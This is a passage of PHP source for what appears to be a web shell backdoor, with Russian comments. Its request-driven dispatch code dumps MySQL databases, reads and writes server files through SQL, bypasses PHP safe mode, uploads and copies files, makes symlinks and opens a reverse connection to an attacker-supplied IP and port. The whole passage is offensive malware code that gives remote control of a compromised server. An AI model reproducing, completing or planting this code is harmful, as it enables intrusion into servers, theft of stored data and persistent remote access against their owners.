//Выводим список таблиц $s = "show_exists_tables"; $res = show_tables($_POST['dbname'], $_POST['host'], $_POST['username'], $_POST['pass']); } elseif ($_POST['b_table']) { //Выводим дамп таблицы $s = "Dump of " . $_POST['tablename']; $tablename = $_POST['tablename']; if ($tablename != "") { $res = dump_table($_POST['tablename'], $_POST['dbname'], $_POST['host'], $_POST['username'], $_POST['pass']); } else { $res = "Select table!"; } } elseif ($_POST['b_safe_fuck']) { //Обход безопасного режима $s = "Open file " . $sfilename . " with MySQL:"; $res = safe_mode_fuck($_POST['sfilename'], $_POST['host'], $_POST['username'], $_POST['pass'], $_POST['dbname']); } elseif ($_POST['b_dfilename']) { //Обход безопасного режима $s = "Dump in " . $dfilename . " from " . $_POST['tablename'] . ":"; $res = run_sql("SELECT * INTO OUTFILE '" . addslashes($_POST['dfilename']) . "' FROM " . $_POST['tablename'], $_POST['dbname'], $_POST['host'], $_POST['username'], $_POST['pass']); } if ($host == "") { $host = "localhost"; } if (isset($res)) { echo "<table BORDER=1 align=center>"; echo "<tr><td alling=center><b>" . $s . "</b></td></tr>"; echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; echo $res; echo "</textarea></td></tr></table>"; }
} else { if (isset($_POST['upload_f']) && isset($_POST['path'])) { upload_file(); } else { if (isset($_REQUEST['rs'])) { reverse_conn_ui(); } else { if (isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port'])) { reverse_conn_bg(); } else { if (isset($_REQUEST['safe_mod']) && isset($_REQUEST['path'])) { chdir($_GET['path']); safe_mode_fuck_ui(); } else { if (isset($_GET['path']) && isset($_GET['safe_mode'])) { safe_mode_fuck(); } else { if (isset($_GET['path']) && isset($_REQUEST['forbd_dir'])) { AccessDenied(); } else { if (isset($_REQUEST['symlink'])) { sym_link(); } else { if (isset($_GET['path']) && isset($_GET['copy'])) { copy_file_ui(); } else { if (isset($_GET['c_file']) && isset($_GET['c_target']) && isset($_GET['cn_name'])) { copy_file_bg(); } else { filemanager_bg(); }